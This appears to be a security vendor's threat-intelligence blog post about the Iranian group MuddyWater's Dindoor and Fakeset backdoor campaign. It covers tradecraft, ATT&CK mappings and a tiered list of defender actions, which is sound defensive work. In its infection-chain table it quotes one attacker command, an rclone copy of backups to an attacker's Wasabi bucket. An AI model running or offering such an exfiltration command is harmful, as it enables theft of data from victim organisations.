Prayukth K V
MuddyWater's new campaign signals a new and escalating phase of Iranian cyber operations
The geopolitical fault lines in the Middle East have always created deep echo in cyberspace. As we have mentioned before (here), Iranian groups were never removed from the overall geopolitical equation in the region. Instead, they were laying low, waiting for the right time to strike and it almost seems like they are now ready to launch the next wave of cyberattacks on targets in the region and beyond.
MuddyWater, the Iranian state-sponsored advanced persistent threat (APT) group formally tied to Iran's Ministry of Intelligence and Security (MOIS), has once again demonstrated that it is not merely a regional nuisance but a persistent, evolving, and strategically motivated adversary capable of deeply compromising critical infrastructure.
The discovery of Dindoor, a previously unknown backdoor leveraging the Deno JavaScript runtime alongside the Python-based Fakeset implant, across U.S. bank networks, airports, nonprofits, and defense-adjacent software companies does not open a new chapter. Instead, it adds a few more paras to the narrative that thrives on the continuation of a calculated, long-running campaign that has been quietly embedding itself in Western networks since at least February 2026. The timing is not coincidental.
This analysis dissects the Dindoor campaign's technical architecture, examines MuddyWater's operational evolution, contextualizes the threat within Iran's broader cyber doctrine, and offers defenders a grounded and actionable framework for response.
Don’t forget to read our blog on “Securing critical infrastructure from APT Groups during geopolitical events,” here.
KEY INSIGHT Iranian APT activity against U.S. targets did not begin after the airstrikes. MuddyWater was already present inside U.S. bank and airport networks many weeks before the first bomb touched the Iranian soil. The cyber conflict preceded and will most certainly outlast any intervening kinetic phase. |
Who Is MuddyWater? A threat actor that refuses to go silent
Origins and Attribution
MuddyWater (also known as Seedworm, TEMP.Zagros, Mango Sandstorm, TA450, and Static Kitten) has been operational since at least 2017, when it first spotted targeting entities in Saudi Arabia, Iraq, Israel, and Turkey. In February 2022, the FBI, CISA, and UK's NCSC jointly attributed MuddyWater to Iran's MOIS.
The group's operational remit is fairly broad: intelligence collection, credential theft, network prepositioning, and, when directed, large scale or targeted destructive operations. Unlike purely financially motivated groups, MuddyWater operates as a cog in a larger Iranian national security apparatus. Its campaigns are often synchronized with broader geopolitical objectives and complemented by other Iranian APT clusters including OilRig (APT34), Charming Kitten (APT42), Elfin, Fox Kitten, and hacktivist fronts like Handala Hack and Void Manticore.
Rapid tooling iteration: A defining factor for MuddyWater
What separates MuddyWater from many APT groups is its ability to modify tools and introduce varients quickly. Historically reliant on PowerShell-based implants and custom backdoors like POWERSTATS, the group has progressively broad-based its malware development efforts across Python, C#, Go, and now JavaScript via the Deno runtime. Each iteration reflects a deliberate response to improved defender visibility into prior toolsets.
The shift to Deno is illustrative of this evolutionary pressure that the group has responded to. Security operations centers (SOCs) have now built significant detection capability around Node.js-based threats and traditional scripting interpreter abuse. By pivoting to Deno which is a modern, security-focused runtime with a distinct process signature, MuddyWater is working towards exploiting detection blind spots. This is not just improvisation, but adversarial learning at scale.
MuddyWater's willingness to rapidly retool (even during low bandwidth times) is one of its most underappreciated characteristics. Organizations that rely on IOC-based detection from prior campaigns will almost always be behind the curve. Behavioral analytics should therefore be the foundation and not the fallback.
Anatomy of the Dindoor backdoor: Technical deep dive
Why Deno? The strategic choice of a runtime
Deno is a modern, secure JavaScript and TypeScript runtime created by Ryan Dahl (the same developer behind Node.js). It was created to specifically address Node.js's architectural shortcomings. It features sandboxed execution by default, built-in TypeScript support, and a permission-based model. In a legitimate developer ecosystem, these features are virtues to be hailed. But for a threat actor, they represent a near-perfect evasion vehicle and path.
Most enterprise endpoint detection and response (EDR) tools and security information and event management (SIEM) platforms are tuned to monitor suspicious invocations of common runtimes such as cmd.exe, PowerShell, python.exe, node.exe, and wscript.exe. Deno (deno.exe) is rarely in those watchlists. When Dindoor executes via Deno, the resulting process tree may appear anomalous to a trained analyst but will pass undetected through signature-based or process-lineage rule sets that lack Deno coverage.
Furthermore, since Deno fetches modules from URLs at runtime and supports HTTP/S imports natively, a Dindoor payload can be remarkably compact on disk. Basically a thin loader that pulls its real functionality from attacker-controlled or legitimate-appearing cloud infrastructure at execution time, complicating static analysis significantly.
The infection chain
While the precise initial access vector has not been called out, we have seen in the past that in every Dindoor incident, MuddyWater's established tradecraft provides a clear frame of reference. The group predominantly uses spear-phishing emails and honeytrap operations to establish beachheads, targeting high-value individuals including administrators, finance staff, and privileged users — with convincing lures.
Once initial access is achieved, the attack proceeds through multiple stages:
Stage | Component | Description |
1 | Initial Access | Spear-phishing / honeytrap operations targeting privileged users; credential harvesting via malicious links or attachments |
2 | Payload Delivery | Dindoor or Fakeset deployed; Fakeset hosted on Backblaze cloud storage (gitempire.s3 and elvenforest.s3 buckets) |
3 | Execution | Dindoor executed via deno.exe; signed with fraudulent certificate issued to 'Amy Cherne' to appear legitimate |
4 | Persistence & Lateral Movement | Scheduled tasks or registry modifications maintain persistence; stolen credentials enable lateral movement across victim networks |
5 | C2 Communication | Encrypted HTTPS comms to cloud storage C2; Backblaze used for Fakeset C2 and payload hosting; Wasabi used as exfiltration target |
6 | Data Exfiltration | Rclone utility used to transfer data: 'rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[BUCKET]' — bulk exfil to attacker-controlled Wasabi buckets |
The certificate reuse problem and why it's a gift to defenders
One of the most analytically significant elements of the Dindoor campaign is the reuse of fraudulent digital certificates across different malware families. Both Dindoor and Fakeset carry certificates issued to fictitious identities — 'Amy Cherne' and 'Donald Gay.' Critically, the Donald Gay certificate has appeared previously in MuddyWater-attributed malware families, specifically Stagecomp and Darkcomp, which have been flagged by Google, Microsoft, and Kaspersky.
Certificate reuse is an operational security failure on MuddyWater's part, but it is a recurring one — suggesting it reflects either resource constraints in their certificate acquisition pipeline or an organizational blind spot. For defenders, this creates a durable hunting opportunity: any binary signed with these certificate identities should be treated as immediately suspicious and investigated as a potential MuddyWater artifact, regardless of the specific malware family.
Fakeset and the multi-backdoor strategy
The deployment of both Dindoor and Fakeset across different victim organizations is not redundancy — it is a deliberate architectural choice. By maintaining separate toolsets signed with the same certificates but implemented in different languages (JavaScript via Deno vs. Python), MuddyWater can adapt to different target environments, evade tool-specific detection, and maintain operational continuity even if one implant family is burned.
The Fakeset backdoor was specifically identified on U.S. airport and nonprofit networks — two sectors with distinct security postures and regulatory environments. Airports, as critical infrastructure, often have more rigorous network segmentation, but Python-based implants blend into developer and administrative tooling with concerning ease in mixed-environment deployments.
Why now?
Cyber operations as Iran's asymmetric equalizer
Iran's cyber capabilities are best understood not as a standalone military branch but as an instrument of statecraft, a flexible, deniable, and scalable tool to project power beyond what conventional military means allow. When Iran faces significant kinetic setbacks, cyber operations historically surge within a short period of time. The pattern has been consistent since at least the Stuxnet revelations of 2010 redirected Iranian attention toward developing offensive cyber capabilities as a core national security priority.
The geopolitical context of early 2026 is peppered with extraordinarily high-stakes for everyone. Iranian state doctrine in this scenario is clear: respond across all available domains. Cyber operations are the most accessible, deniable, and immediate asymmetric tool available and Iran will make use of it.
Pre-positioning before the bombs dropped
The detail that demands the most serious analytical attention is this: MuddyWater's activity on U.S. bank, airport, and defense-sector software company networks began in early February 2026 just weeks before the February 28 airstrikes. This is not reactive. This is pre-positioning.
The ability to pre-position in order to establish persistent access to high-value targets before a triggering geopolitical event is the hallmark of a fairly mature, well-resourced APT program. It means Iran had intelligence suggesting an escalation was coming, or that it maintains persistent access to U.S. critical infrastructure as a standing capability regardless of the current threat environment. The pivot from espionage to destruction, when directed, could happen with minimal additional access effort.
The Dindoor campaign is not just about data theft. It is about optionality. Iran is building cross-domain leverage and the ability to cause disruption on demand, in sectors that matter most, when geopolitical circumstances call for it. Treating this as a standard espionage case would be a category error
The broader Iranian cyber ecosystem
MuddyWater does not operate in isolation. The Iranian cyber threat ecosystem in early 2026 involves multiple simultaneously active threat clusters, each with distinct targeting profiles, toolsets, and operational objectives:
• Agrius: Agrius — primarily focused on destructive operations using wiper malware, historically targeting Israeli organizations.
• OilRig: OilRig (APT34) — sophisticated intelligence collection against government and energy sectors, with a history of targeting Middle Eastern and North American organizations.
• Charming Kitten: Charming Kitten (APT42) — specializing in credential phishing campaigns targeting journalists, academics, and policy figures with access to sensitive information.
• Fox Kitten: Fox Kitten — known for exploitation of VPN vulnerabilities and initial access brokering for other Iranian APT groups.
• Hacktivist Fronts: Handala Hack and Void Manticore — hacktivist fronts conducting disruptive, psychologically oriented operations in parallel with state espionage campaigns.
The simultaneous activation of multiple Iranian cyber clusters in response to geopolitical escalation creates a layered threat environment that overwhelms defenders focused on a single adversary profile. Security teams must operate with the understanding that a MuddyWater detection may be the visible surface of a much broader Iranian cyber operation already underway.
MITRE ATT&CK Mapping: Operationalizing the threat
Understanding the Dindoor campaign through the MITRE ATT&CK framework enables defenders to translate threat intelligence into detection engineering priorities. The following table maps confirmed and assessed TTPs from the campaign:
ATT&CK ID | Technique | Dindoor/MuddyWater Context |
T1566.001 | Phishing: Spearphishing | Primary initial access vector; targeted phishing with sector-specific lures and honeytrap operations |
T1059.007 | Command Scripting: JavaScript | Dindoor executes malicious JavaScript via Deno runtime — core evasion mechanism |
T1027 | Obfuscated Files or Information | Malware signed with fraudulent certificates; cloud-hosted payloads reduce on-disk footprint |
T1071.001 | Application Layer Protocol: Web | HTTPS-based C2 comms; cloud storage services used to disguise malicious traffic |
T1105 | Ingress Tool Transfer | Rclone used to stage and transfer data; Fakeset downloaded from Backblaze URLs |
T1041 | Exfiltration Over C2 Channel | Data exfiltrated to attacker-controlled Wasabi cloud storage buckets via Rclone |
T1053 | Scheduled Task / Job | Persistence maintained via scheduled tasks or registry modifications post-compromise |
T1078.002 | Valid Accounts: Domain Accounts | Stolen credentials used for lateral movement and privilege escalation within victim environments |
T1553.002 | Subvert Trust Controls: Code Signing | Fraudulent certificates ('Amy Cherne', 'Donald Gay') used to make malware appear legitimate |
Detection priorities based on this mapping should include: anomalous Deno runtime execution, unusual cloud storage egress (particularly to Backblaze or Wasabi), Rclone presence in environments where it has no legitimate use, and certificate-based hunting for known MuddyWater signing identities.
The defender's playbook: Grounded, prioritized response
Tier 1: Immediate Detection and Hunting Actions
• Deno Process Hunting: Hunt for Deno runtime (deno.exe) on all endpoints flag any instance in environments where TypeScript/JavaScript development is not an established function.
• Cloud Storage Traffic Audit: Query SIEM for outbound connections to Backblaze (backblazeb2.com) and Wasabi (wasabisys.com) storage to correlate with time-of-day, user identity, and data volume anomalies.
• Rclone Detection: Search for Rclone (rclone.exe) installation or execution, particularly command-line invocations referencing 'wasabi:' as a destination.
• Certificate Hunting: Execute certificate-based threat hunting: query your environment for any binaries signed by certificates issued to 'Amy Cherne' or 'Donald Gay' treat matches as high-confidence MuddyWater artifacts.
• YARA Rule Deployment: Deploy YARA rules for Dindoor (SHA-256: 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542) and Fakeset malware families across EDR platforms.
Tier 2: Architectural and Policy Controls
• Runtime Whitelisting: Implement application whitelisting policies that explicitly deny execution of non-approved runtimes, including Deno. Review your approved runtime list against current developer tooling needs.
• MFA Hardening: Enforce phishing-resistant MFA (FIDO2/WebAuthn) across all privileged accounts. MuddyWater's credential theft pipeline depends on compromising accounts that remain protected only by traditional MFA factors.
• Egress Filtering: Review and tighten egress firewall rules to require explicit approval for traffic to cloud storage providers not in your organization's approved vendor list.
• Network Segmentation: Implement network segmentation controls that prevent lateral movement from compromised endpoints to sensitive systems particularly between corporate and operational technology (OT) networks in airports and industrial environments.
• Tabletop Exercises: Conduct tabletop exercises simulating an Iranian APT pre-positioning scenario specifically the pivot from passive collection to destructive action to stress-test your incident response playbooks.
Tier 3: Threat Intelligence Integration
•Threat Intel Feeds: Subscribe to threat intelligence feeds that provide near-real-time indicators from MuddyWater campaigns such as from Shieldworkz.
• Vulnerability Prioritization: Patch aggressively against CVEs known to be exploited by Iranian APTs, with priority on CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2025-34067, and CVE-2021-33044.
• IOC Integration: Integrate MuddyWater's known C2 infrastructure indicators, including specific Backblaze and Wasabi bucket URLs documented in Symantec reporting, into your SIEM and DNS filtering platforms.
FOR CRITICAL INFRASTRUCTURE OPERATORS Banking, aviation, and defense-sector organizations face an elevated and specific risk from this campaign. The MuddyWater intrusion into a U.S. airport represents a concerning precedent. Organizations in these sectors should assume they may already be compromised and conduct a proactive threat hunt before waiting for alerts. |
Beyond the campaign: What Iranian APT groups’ future trajectory
The cloud as coth shield and sword
Perhaps the most strategically significant aspect of the Dindoor campaign is MuddyWater's wholesale embrace of legitimate cloud infrastructure as both a delivery mechanism and an exfiltration channel. Backblaze and Wasabi are legitimate, commercially available cloud storage services used by millions of businesses globally. Their traffic is almost universally permitted in enterprise network environments.
By routing malware delivery and data exfiltration through these platforms, MuddyWater effectively weaponizes the trust that organizations extend to cloud services as a matter of operational necessity. This is not a new concept — it has been observed in multiple APT campaigns over the past five years — but MuddyWater's application of it signals a broader trend: the cloud perimeter is becoming the primary battleground for advanced persistent threats, and traditional network-layer defenses are insufficient in isolation.
Living off the land, But at a much higher altitude
The use of Deno alongside the Rclone utility represents a sophisticated variation of living-off-the-land (LotL) techniques. Rather than abusing Windows built-in utilities like wmic.exe or certutil.exe that are now heavily monitored, MuddyWater is exploiting the legitimacy of cross-platform, open-source developer tools that are increasingly present in modern enterprise environments. This signals a maturation in Iranian LotL methodology: moving from OS-native binary abuse to ecosystem-native tool abuse.
The implication for defenders is significant: your detection engineering must evolve from 'what Windows binaries are being abused' to 'what legitimate tools anywhere in our environment could be weaponized, and are we monitoring their execution context closely enough to distinguish legitimate from malicious use?'
The espionage-to-disruption pivot risk
Every confirmed MuddyWater intrusion in this campaign involves a network where the initial objective appears to be intelligence collection. But pre-positioned access for collection is functionally identical to pre-positioned access for disruption. The difference is intent — and intent is not observable from network telemetry alone.
Iran's history of cyber operations includes destructive campaigns: Shamoon against Saudi Aramco in 2012, the DDoS campaigns against U.S. financial institutions in Operation Ababil, and more recently the wiper attacks attributed to Agrius against Israeli targets. The lesson from this history is that Iran's cyber actors do not distinguish permanently between espionage and disruption. Instead they shift modes in response to political direction.
The organizations currently compromised by Dindoor and Fakeset that includes a bank, an airport, defense-sector software suppliers are exactly the kinds of targets that would feature in a disruptive Iranian cyber operation designed to maximize psychological and economic impact on the United States. This is not a theoretical risk. It is a live and present one.
A persistent threat
The Dindoor campaign is not an isolated incident. It is a data point in a long-running pattern of Iranian cyber operations against Western targets — a pattern that has escalated consistently with each geopolitical flashpoint and shows no sign of reversal.
MuddyWater's deployment of a novel, Deno-based backdoor, its simultaneous use of a Python implant family, its embrace of legitimate cloud services for both delivery and exfiltration, and its careful attention to certificate-based legitimization together paint a picture of an adversary that is methodical, adaptive, and patient. These are not the characteristics of a threat that will be neutralized by a single defensive measure or a single geopolitical development.
Organizations, particularly those in financial services, aviation, critical infrastructure, and defense contracting, must treat the Iranian cyber threat as a structural and permanent feature of their risk landscape and not a periodic concern to be addressed when a new campaign headline appears. The investment in behavioral detection, threat hunting, cloud traffic visibility, and continuous threat intelligence integration is not optional. It is the cost of operating in a world where adversaries of this sophistication have already decided you are a target.
The Iranian threat actors are not back. They never left. The question is whether your organization is ready for what is lined up.
Request a briefing.
Additional resources:
IEC 62443-Based Risk assessment checklist for Airport operations and critical infrastructure
Operational Technology (OT) Incident response checklist
IEC 62443 OT Cybersecurity Risk Assessment Field Checklist for Oil & Gas Sites
Defensive Posture Guidance for Middle Eastern Enterprises
Get Weekly
Resources & News
You may also like
NERC CIP-015-2 Explained: Expanding INSM to EACMS and PACS
Team Shieldworkz
Securing critical infrastructure from APT Groups during geopolitical events
Prayukth K V
Decoding the Strategic Quiet of Iranian Cyber Groups
Team Shieldworkz
How the Iran crisis is impacting cyber space
Team Shieldworkz
Cyber threats in the Middle East: What organizations need to know right now
Team Shieldworkz
Building an OT Cybersecurity Program with IEC 62443 and NIST SP 800-82
Team Shieldworkz
